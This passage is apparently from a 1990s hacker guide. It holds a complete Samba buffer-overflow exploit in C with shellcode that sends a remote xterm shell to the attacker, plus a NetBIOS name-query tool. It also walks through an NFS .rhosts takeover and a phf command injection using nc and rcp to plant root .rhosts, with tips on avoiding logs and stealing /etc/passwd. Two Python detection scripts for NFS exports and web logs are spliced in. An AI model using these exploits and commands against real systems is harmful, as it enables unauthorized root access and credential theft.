                username[i+3] = (val & 0xff000000) >> 24;
        }

        username[ sizeof(username) ] = 0;

        printf("GET %s\n/bin/bash -i 2>&1;\n", username);
}


And, last but not least, the samba ExpLoit.. :)

/*
                      ___      ______      _       _
                    /     \   |   _   \   |  \   /  |
                   |  / \  |  |  |  \  |  |   \_/   |
                   | |___| |  |  |_ /  |  |   \_/   |
                   |  ---  |  |       /   |  |   |  |
                   '''   '''   '''''''    ''''   ''''

                    CreW Presente For Y0uR plEaSure

                    Samba remote & LocaL buffer overflow!

 found & exploited by some "blaireaux" and "mr3615phf" :)))))))))))  <joke>

recursive greetz: ADM !

a special greetz to the ppl of the "offset effort" fr4wd,fratalG,and the rest
of t0xyn , and my friend [oO giemor Oo] <yes i have a sploit :)
,kod,theblade,reformed,m0sfet,kewl,oldmaster,owl,th0s

gigaacidbrutalhardcorebigextra greetz to da Beautiful: Heike <i'am in heIk3c0re
>.

big up to: da movement <stay cool ! >.

codeurz greetz going to: aleph1 <the guru its ALL !> & to samba team
<i love samba :) really !>

anal greetz: #banane suxxxxxxxxxxx  Hotlame & Co <kill diz lamer>
------------------------------------------------------------------------------
explanation of the bug: it's really simple, if you send a large passwd bha
you make a buffer overflow hahhahaha =) i'm not good at explaining, go fuck !=))
                                --**JOKE**--

------------------------------------------------------------------------------
patch ?? WHAT U WANNA A PATCH ??? :))))
------------------------------------------------------------------------------

[SO..] we are looking for the shellcode of other systems (SUNos , solaris, etc)
and especially SCO !

------------------------------------------------------------------------------
usage: first you must have a special smbclient to send a large large passwd
how ?? get the source of samba and change in smb.h
at line 248:
typedef char pstring[1024];
to
typedef char pstring[20000];
and now compile smbclient !

# make smbclient

[dont forget to edit the makefile !!]
see the line 199 in makefile

-------------------------------------------------------------------------------
mail 4 question, comments etc etc bla bla : admsmb@hotmail.com

-------------------------------------------------------------------------------

*/

/* Note: i have included a little utility pinched from ADMtoolz
 to get the netbios name

  --------------------------------------------------------------------------
------------------------------[ADMnmbname.c]----------------------------------
  --------------------------------------------------------------------------  */

#define DEFAULT_OFFSET 3500
#define DEFAULT_BUFFER_SIZE 3081
#define NOP 0x90
#define NMBHDRSIZE 13
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/ip_tcp.h>

struct nmbhdr {
unsigned short int id;

unsigned char  R:1;
unsigned char  opcode:4;
unsigned char  AA:1;
unsigned char  TC:1;
unsigned char  RD:1;
unsigned char  RA:1;
unsigned char  unless:2;
unsigned char  B:1;
unsigned char  RCODE:4;

unsigned short int que_num;
unsigned short int rep_num;
unsigned short int num_rr;
unsigned short int num_rrsup;
unsigned char namelen;
};

struct typez{
u_int type;
u_int type2;
};

unsigned int host2ip(char *serv)
{
struct sockaddr_in sin;
struct hostent *hent;

hent=gethostbyname(serv);
if(hent == NULL) return 0;
bzero((char *)&sin, sizeof(sin));
bcopy(hent->h_addr, (char *)&sin.sin_addr, hent->h_length);
return sin.sin_addr.s_addr;
}

main( int argc, char  **argv)
{
struct sockaddr_in  sin_me , sin_dst;
struct nmbhdr *nmb,*nmb2;
struct iphdr *ipz;
struct typez  *typz;
struct hostent *hent;
int socket_client,sr,num,i=1,bha,timeout=0,try=0,GO=0;
int longueur=sizeof(struct sockaddr_in);
char  *data;
char  *dataz;
char   buffer[1024];
char   buffer2[1024];
char   namezz[1024];
char   name[64]="CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0";
char   c;

if(argc <2) {
        printf("usage: ADMnmbname <ip of the victim>\n");
        exit (0);
        }

socket_client=socket(AF_INET,SOCK_DGRAM,17);
sr=socket(AF_INET,SOCK_RAW,17);
ioctl(sr,FIONBIO,&i);

sin_me.sin_family=AF_INET;
sin_me.sin_addr.s_addr=htonl(INADDR_ANY);
sin_me.sin_port=htons(2600);

sin_dst.sin_family=AF_INET;
sin_dst.sin_port=htons(137);
sin_dst.sin_addr.s_addr = host2ip(argv[1]);

nmb = (struct nmbhdr *)  buffer;
data = (char *)(buffer+NMBHDRSIZE);
typz = (struct typez *)(buffer+NMBHDRSIZE+33);
nmb2 = (struct nmbhdr *)(buffer2+20+8);
ipz   = (struct iphdr *)buffer2;
dataz = (char *)(buffer2+50+7+20+8);

memset(buffer,0,1024);
memset(buffer2,0,1024);
memset(namezz,0,1024);
memcpy(data,name,33);

           /* play with the netbios query format :) */

nmb->id=0x003;
nmb->R=0;                  /* 0 for question 1 for response */
nmb->opcode=0;             /* 0 = query */
nmb->que_num=htons(1);     /* i have only 1 question :) */
nmb->namelen=0x20;
typz->type=0x2100;
typz->type2=0x1000;

sendto(socket_client,buffer,50,0,(struct sockaddr *)&sin_dst,longueur);

  for(timeout=0;timeout<90;timeout++ )
  {
           usleep(100000);
           buffer2[0]='0';
           recvfrom(sr,buffer2,800,0,(struct sockaddr *)&sin_dst,&(int)longueur);

        if(buffer2[0]!='0')
                {

                          if(nmb2->rep_num!=0)
                            {
                            bha=0;

                                     for(;;)
                                     {

                                        c=*(dataz+bha);
                                        if(c!='\x20')
                                                        {

                                                        namezz[bha]=c;
                                                        bha++;
                                                         }
                                        if(c=='\x20')break;
                                   }

                                printf("netbios name of %s is %s\n",argv[1],namezz);
                                try =4;
                                GO = 4;

                                break;
                              }
                }

     }

memset(buffer,0,1024);
memset(buffer2,0,1024);

}

/*
 ---------------------------------------------------------------------------
----------------------------[ADMkillsamba.c]---------------------------------
 ---------------------------------------------------------------------------

         generic buffer overflow ameliorated for samba sploit
 the sploit sends a xterm to your machine .
 hey dont forget to do a  xhost +IP-OF-VICTIM  !!!!
 and put the sploit in the same directory as the special smbclient !

 */

/* diz default offset and buffer size work fine on my system Redhat 4.2 with
 samba server

1.9.17alpha5 < the last version !> i have tested on other systems with this
default buff & size

smb 1.9.16p[9-11] the default srv on redhat 4.1 4.2  but sometimes you need to
change the

buffer size and offset   try a buffer of ( 1050<buffer >1100) and a offset
( 1500<off >2500)

mail me at admsmb@hotmail.com if u wanna some help */

#define DEFAULT_OFFSET 3500
#define DEFAULT_BUFFER_SIZE 3081
#define NOP 0x90
#include <stdlib.h>
#include <strings.h>

unsigned char shellcode[500] =

"\xeb\x2f\x5f\xeb\x4a\x5e\x89\xfb\x89\x3e\x89\xf2\xb0\xfe\xae\x74"
"\x14\x46\x46\x46\x46\x4f\x31\xc9\x49\xb0\xff\xf2\xae\x30\xc0\x4f"
"\xaa\x89\x3e\xeb\xe7\x31\xc0\x89\x06\x89\xd1\x31\xd2\xb0\x0b\xcd"
"\x80\xe8\xcc\xff\xff\xff";

unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");
}

void main(int argc, char *argv[]) {
  char *buff, *ptr;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  char netbios_name[100];

  char bufferz[255];
  char ipz[40];
  char myipz[40];
  unsigned char bla[50] = "\xfe\xe8\xb1\xff\xff\xff";
  int *ret;
  unsigned char cmd[50]="/usr/bin/X11/xterm\xff-display\xff";
  unsigned char arg1[50];
  char arg2[50]="bhahah\xff";

  int i,pid;

  bzero(netbios_name,100);
  bzero(bufferz,255);
  bzero(ipz,40);
  bzero(ipz,40);

  if(argc <4){
  printf(" usage: ADMkillsamba <ip of the victim> <netbios name> <your ip> [buff size] [offset size]\n");
  printf("<ip of victim> = 11.11.11.11  ! THe numerical IP  Only ! not www.xxx.cc !\n");
  printf("<netbios name> = VICTIME    for get the netbios name use ADMnmbname or ADMhack\n");
  printf("<your ip> = the sploit send a xterm to your machine heh \n");
  printf("option:\n");
  printf("[buff size] = the size of the buffer to send default is 3081 try +1 -1 to a plage of +10 -10\n");
  printf("[offset size] = the size of the offset default is 3500 try +50 -50 to a plage of 1000 -1000\n");
  printf(" HaVe Fun\n");
  exit(0);
  }

    sprintf(arg1,"%s:0\xff-e\xff/bin/sh\xff",argv[3]);

    shellcode[4] =(unsigned char)0x32+strlen(cmd)+strlen(arg1);
    bla[2] =(unsigned char) 0xc9-strlen(cmd)-strlen(arg1);

 printf("4 byte = 0x%x\n",shellcode[4]);
 printf("5 byte = 0x%x\n",bla[2]);

  strcat(shellcode,cmd);
  strcat(shellcode,arg1);
  strcat(shellcode,bla);
  strcat(shellcode,"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx");

//  printf("%s\n",shellcode);

  strcpy(ipz,argv[1]);                   /* haha u can overflow my sploit :) */
  strcpy(netbios_name,argv[2]);

  if (argc > 4) bsize  = atoi(argv[4]);
  if (argc > 5) offset = atoi(argv[5]);

  if (!(buff = malloc(bsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }

sprintf(bufferz,"\\\\\\\\%s\\\\IPC$",netbios_name);

  addr =  0xbffffff0 - offset ;
  printf("Using address: 0x%x\n", addr);

  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  for (i = 0; i < bsize/4; i++)
    buff[i] = NOP;

  ptr = buff + ((bsize/4) - (strlen(shellcode)/2));
  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';

  execl("./smbclient","smbclient",bufferz,buff,"-I",ipz,NULL);

 }

------------------------------------------[END]------------------------------------------------

Now, don't you wish you had samba ?????????? :)
Well, this about covers most of it, but it covers only the exploit part...
For the rest, I use my very, very old guide to explain the NFS problems &&
phf.. bcoz I got tired of writing... sooooooooooooo ... here it is.. :)
<snif>
The first thing I do is see if the system has an export list:

mysite:~>/usr/sbin/showmount -e victim.site.com
RPC: Program not registered.

If it gives a message like this one, then it's time to look for another way
in.
What I was trying to do was to exploit an old security problem in most
SunOS versions that could allow a remote attacker to add a .rhosts to a user's
home directory... (That was possible if the site had exported their home
directories over NFS.)
Let's see what happens...


mysite:~>/usr/sbin/showmount -e victim1.site.com
/usr  victim2.site.com
/home (everyone)
/cdrom (everyone)
mysite:~>mkdir /tmp/mount
mysite:~>/bin/mount -nt nfs victim1.site.com:/home /tmp/mount/
mysite:~>ls -sal /tmp/mount
   total 9
   1 drwxrwxr-x   8 root     root         1024 Jul  4 20:34 ./
   1 drwxr-xr-x  19 root     root         1024 Oct  8 13:42 ../
   1 drwxr-xr-x   3 at1      users        1024 Jun 22 19:18 at1/
   1 dr-xr-xr-x   8 ftp      wheel        1024 Jul 12 14:20 ftp/
   1 drwxrx-r-x   3 john     100          1024 Jul  6 13:42 john/
   1 drwxrx-r-x   3 139      100          1024 Sep 15 12:24 paul/
   1 -rw-------   1 root     root          242 Mar  9  1997 sudoers
   1 drwx------   3 test     100          1024 Oct  8 21:05 test/
   1 drwx------  15 102      100          1024 Oct 20 18:57 rapper/

Well, we wanna hack into rapper's home.
mysite:~#id
uid=0 euid=0
mysite:~#whoami
root
mysite:~#echo "rapper::102:2::/tmp/mount:/bin/csh" >> /etc/passwd

We use /bin/csh because bash usually leaves a (Damn!) .bash_history  and you 
might forget it on the remote server...

mysite:~>su - rapper
Welcome to rapper's user.
mysite:~>ls -lsa /tmp/mount/
   total 9
   1 drwxrwxr-x   8 root     root         1024 Jul  4 20:34 ./
   1 drwxr-xr-x  19 root     root         1024 Oct  8 13:42 ../
   1 drwxr-xr-x   3 at1      users        1024 Jun 22 19:18 at1/
   1 dr-xr-xr-x   8 ftp      wheel        1024 Jul 12 14:20 ftp/
   1 drwxrx-r-x   3 john     100          1024 Jul  6 13:42 john/
   1 drwxrx-r-x   3 139      100          1024 Sep 15 12:24 paul/
   1 -rw-------   1 root     root          242 Mar  9  1997 sudoers *snifsnif*
   1 drwx------   3 test     100          1024 Oct  8 21:05 test/
   1 drwx------  15 rapper   daemon       1024 Oct 20 18:57 rapper/

So we own this guy's home directory...

mysite:~>echo "+ +" > rapper/.rhosts
mysite:~>cd /
mysite:~>rlogin victim1.site.com
Welcome to Victim.Site.Com.
SunOs ver....(crap).
victim1:~$
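As an added defender's check (not part of the original guide), the script below parses `showmount -e` output like the listing above and flags exports that anyone can mount, since the walkthrough shows that a world export of /home lets any client that creates an account with the owner's uid plant a .rhosts. The sample output and the list of home-directory prefixes are assumptions.

```python
# Assumed prefixes under which home directories usually live.
HOME_PREFIXES = ('/home', '/export/home', '/users')


def parse_showmount(output):
    """Parse `showmount -e` output into {export_path: [client, ...]}.

    Accepts the layouts shown above: "/home (everyone)", "/usr  victim2.site.com"
    and comma-separated client lists; header and RPC error lines are ignored.
    """
    exports = {}
    for line in output.splitlines():
        line = line.strip()
        if not line.startswith('/'):
            continue
        path, _, clients = line.partition(' ')
        exports[path] = [c.strip() for c in clients.split(',') if c.strip()]
    return exports


def audit_exports(output):
    """Return (path, severity, reason) for every export a defender should review."""
    findings = []
    for path, clients in parse_showmount(output).items():
        world = any(c in ('(everyone)', '*') for c in clients)
        base = path.rstrip('/')
        is_home = base in HOME_PREFIXES or base.startswith(tuple(p + '/' for p in HOME_PREFIXES))
        if world and is_home:
            findings.append((path, 'critical', 'home directories exported to everyone: '
                             'any client that creates a local account with the owner uid can write .rhosts'))
        elif world:
            findings.append((path, 'high', 'exported to everyone; restrict to named clients'))
        elif is_home:
            findings.append((path, 'medium', 'home directories exported; confine to trusted clients'))
    return findings


# Constructed sample mirroring the showmount listing in the text.
SAMPLE_OUTPUT = """\
Export list for victim1.site.com:
/usr  victim2.site.com
/home (everyone)
/cdrom (everyone)
"""

if __name__ == '__main__':
    for path, severity, reason in audit_exports(SAMPLE_OUTPUT):
        print('%-8s %-8s %s' % (severity, path, reason))
```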
Well, now be very careful with the web exploits, because they usually get
logged. (not usually, always.. :))
Besides, if you really wanna get a source file from /cgi-bin/, use this
syntax: lynx http://www.victim1.com//cgi-bin/finger...
that should work on some systems.. :)
If you don't wanna do that, then do a :

mysite:~>echo "+ +" > /tmp/rhosts

mysite:~>echo "GET /cgi-bin/phf?Qalias=x%0arcp+phantom@mysite.com:/tmp/rhosts+/root/.rhosts" | nc -v - 20 victim1.site.com 80
mysite:~>rlogin -l root victim1.site.com
Welcome to Victim1.Site.Com.
victim1:~#

or instead of rcp-ing, try cat-ing the /etc/passwd file and then cracking
it to get passwords...

And so on......
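The text notes that web exploits always get logged; as an added example (not from the original guide), the scanner below walks Common Log Format access-log lines and flags the three request shapes described on this page: a newline (%0a) injected into a phf query, an oversized Count.cgi query string, and the doubled-slash CGI path. The log lines and the 1024-byte query threshold are constructed.

```python
import re
from urllib.parse import unquote_plus

# NCSA/Apache Common Log Format: host ident authuser [date] "request" status bytes
CLF_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: (?P<proto>[^"]*))?" (?P<status>\d{3}) (?P<size>\S+)$'
)
MAX_QUERY = 1024  # assumed threshold; the Count.cgi exploit above sends a 4 KB query string


def analyse_request(target):
    """Return the reasons a request target matches an attack pattern from the text."""
    reasons = []
    path, _, query = target.partition('?')
    decoded = unquote_plus(query)  # %0a -> newline, '+' -> space
    if '/cgi-bin/' in path and ('\n' in decoded or '\r' in decoded):
        reasons.append('newline injected into CGI query (phf-style command injection)')
    if '/cgi-bin/' in path and len(query) > MAX_QUERY:
        reasons.append('oversized CGI query string (%d bytes, overflow attempt)' % len(query))
    if target.startswith('//'):
        reasons.append('doubled leading slash (CGI source disclosure trick)')
    return reasons


def scan_log(lines):
    """Parse CLF lines and return (host, target, reasons) for each suspicious request."""
    hits = []
    for line in lines:
        m = CLF_RE.match(line)
        if not m:
            continue  # malformed line: skip it rather than abort the scan
        reasons = analyse_request(m.group('target'))
        if reasons:
            hits.append((m.group('host'), m.group('target'), reasons))
    return hits


# Constructed sample log; hosts and timestamps are made up.
SAMPLE_LOG = [
    '10.0.0.5 - - [20/Oct/1997:18:57:01 +0000] "GET /cgi-bin/phf?Qalias=x%0acat+/etc/passwd HTTP/1.0" 200 1840',
    '10.0.0.7 - - [20/Oct/1997:18:58:10 +0000] "GET /cgi-bin/Count.cgi?user=a' + 'A' * 4200 + ' HTTP/1.0" 500 0',
    '10.0.0.9 - - [20/Oct/1997:18:59:00 +0000] "GET //cgi-bin/finger HTTP/1.0" 200 220',
    '10.0.0.2 - - [20/Oct/1997:19:00:00 +0000] "GET /index.html HTTP/1.0" 200 1024',
    '10.0.0.2 - - [20/Oct/1997:19:00:05 +0000] "GET /cgi-bin/phf?Qalias=smith HTTP/1.0" 200 300',
]

if __name__ == '__main__':
    for host, target, reasons in scan_log(SAMPLE_LOG):
        print(host, target[:50], '->', '; '.join(reasons))
```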